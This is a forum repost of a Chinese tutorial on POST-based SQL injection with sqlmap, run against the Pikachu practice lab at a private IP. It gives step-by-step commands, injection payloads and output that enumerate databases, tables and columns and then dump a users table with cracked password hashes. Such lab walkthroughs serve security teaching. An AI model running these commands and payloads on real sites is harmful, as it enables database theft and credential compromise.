安全矩阵

 找回密码
 立即注册
搜索
查看: 2457|回复: 0

Sqlmap中POST注入的两种方式

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-7-2 14:30:30 | 显示全部楼层 |阅读模式
原文链接:Sqlmap中POST注入的两种方式

一、检测是否存在注入
1、通过BurpSuite抓包获取提交的数据

2、指定提交的数据

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2"
--data指定提交的数据

运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入
  1. [14:37:09] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  2. POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  3. sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
  4. ---
  5. Parameter: id (POST)
  6.     Type: boolean-based blind
  7.     Title: AND boolean-based blind - WHERE or HAVING clause
  8.     Payload: id=1 AND 9442=9442&submit=%E6%9F%A5%E8%AF%A2
  9.     Type: error-based
  10.     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
  11.     Payload: id=1 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4194=4194,1))),0x7170717671),4194)&submit=%E6%9F%A5%E8%AF%A2
  12.     Type: time-based blind
  13.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  14.     Payload: id=1 AND (SELECT 2494 FROM (SELECT(SLEEP(5)))BUUY)&submit=%E6%9F%A5%E8%AF%A2
  15.     Type: UNION query
  16.     Title: Generic UNION query (NULL) - 2 columns
  17.     Payload: id=1 UNION ALL SELECT CONCAT(0x717a717871,0x59534b7664464e646f414f4e546e6c72455448476447636f50574a75434971514a486f6d724a664e,0x7170717671),NULL-- -&submit=%E6%9F%A5%E8%AF%A2
  18. ---
  19. [14:37:16] [INFO] the back-end DBMS is MySQL
  20. web application technology: PHP 5.4.45, Nginx 1.15.11, PHP
  21. back-end DBMS: MySQL >= 5.6
  22. [14:37:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/ou
复制代码

二、获取数据库名称

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs

运行结果:

  1. [14:42:01] [INFO] the back-end DBMS is MySQL
  2. web application technology: Nginx 1.15.11, PHP, PHP 5.4.45
  3. back-end DBMS: MySQL >= 5.6
  4. [14:42:01] [INFO] fetching database names
  5. available databases [10]:
  6. [*] challenges
  7. [*] dvwa
  8. [*] information_schema
  9. [*] mysql
  10. [*] performance_schema
  11. [*] pikachu
  12. [*] security
  13. [*] sys
  14. [*] www_dgdg_com
  15. [*] www_zm_com
  16. [14:42:01] [INFO] fetched data logged to text files under '/root/.local/share<code><span class="code-snippet_outer"><span class="code-snippet__string">/sqlmap/output/192.168.139.129'</span> </span></code>
复制代码

三、获取表名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

运行结果:

  1. 14:44:08] [INFO] the back-end DBMS is MySQL
  2. web application technology: PHP, PHP 5.4.45, Nginx 1.15.11
  3. back-end DBMS: MySQL >= 5.6
  4. [14:44:08] [INFO] fetching tables for database: 'pikachu'
  5. Database: pikachu
  6. [5 tables]
  7. +----------+
  8. | member   |
  9. | httpinfo |
  10. | message  |
  11. | users    |
  12. | xssblind |
  13. +----------+
  14. [14:44:08] [INFO] fetched data logged to text files under '/root/.local/share/sq<code><span class="code-snippet_outer"><span class="code-snippet__string">lmap/output/192.168.139.129'</span></span></code>
复制代码

四、获取字段名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns
运行结果:
  1. [14:51:18] [INFO] the back-end DBMS is MySQL
  2. web application technology: PHP, PHP 5.4.45, Nginx 1.15.11
  3. back-end DBMS: MySQL >= 5.6
  4. [14:51:18] [INFO] fetching columns for table 'users' in database 'pikachu'
  5. Database: pikachu
  6. Table: users
  7. [4 columns]
  8. +----------+------------------+
  9. | Column   | Type             |
  10. +----------+------------------+
  11. | level    | int(11)          |
  12. | id       | int(10) unsigned |
  13. | password | varchar(66)      |
  14. | username | varchar(30)      |
  15. +----------+------------------+
  16. [14:51:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
复制代码

五、获取字段内容

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump "username,password

运行结果:

  1. Database: pikachu                                                                        
  2. Table: users
  3. [3 entries]
  4. +----+---------+-------------------------------------------+----------+
  5. | id | level   | password                                  | username |
  6. +----+---------+-------------------------------------------+----------+
  7. | 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |
  8. | 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |
  9. | 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |
  10. +----+---------+-------------------------------------------+----------+
  11. [14:56:08] [INFO] table 'pikachu.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/pikachu/users.csv'                                                
  12. [14:56:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
复制代码

六、其他检测POST注入方法
1、BurpSuite抓包,将数据包内容保存到1.txt
  1. POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
  2. Host: 192.168.139.129
  3. Content-Length: 30
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://192.168.139.129
  7. Content-Type: application/x-www-form-urlencoded
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://192.168.139.129/pikachu/vul/sqli/sqli_id.php
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4
  14. Connection: close
  15. id=1&submit=%E6%9F%A5%E8%AF%A2
复制代码
2、获取数据库名称
  1. sqlmap -r /home/aiyou/桌面/1.txt --dbs
  2. -r:指定数据包的绝对路径
复制代码

3、获取表名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu --tables
4、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --columns
5、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --dump "username,password"



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 08:54 , Processed in 0.013218 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表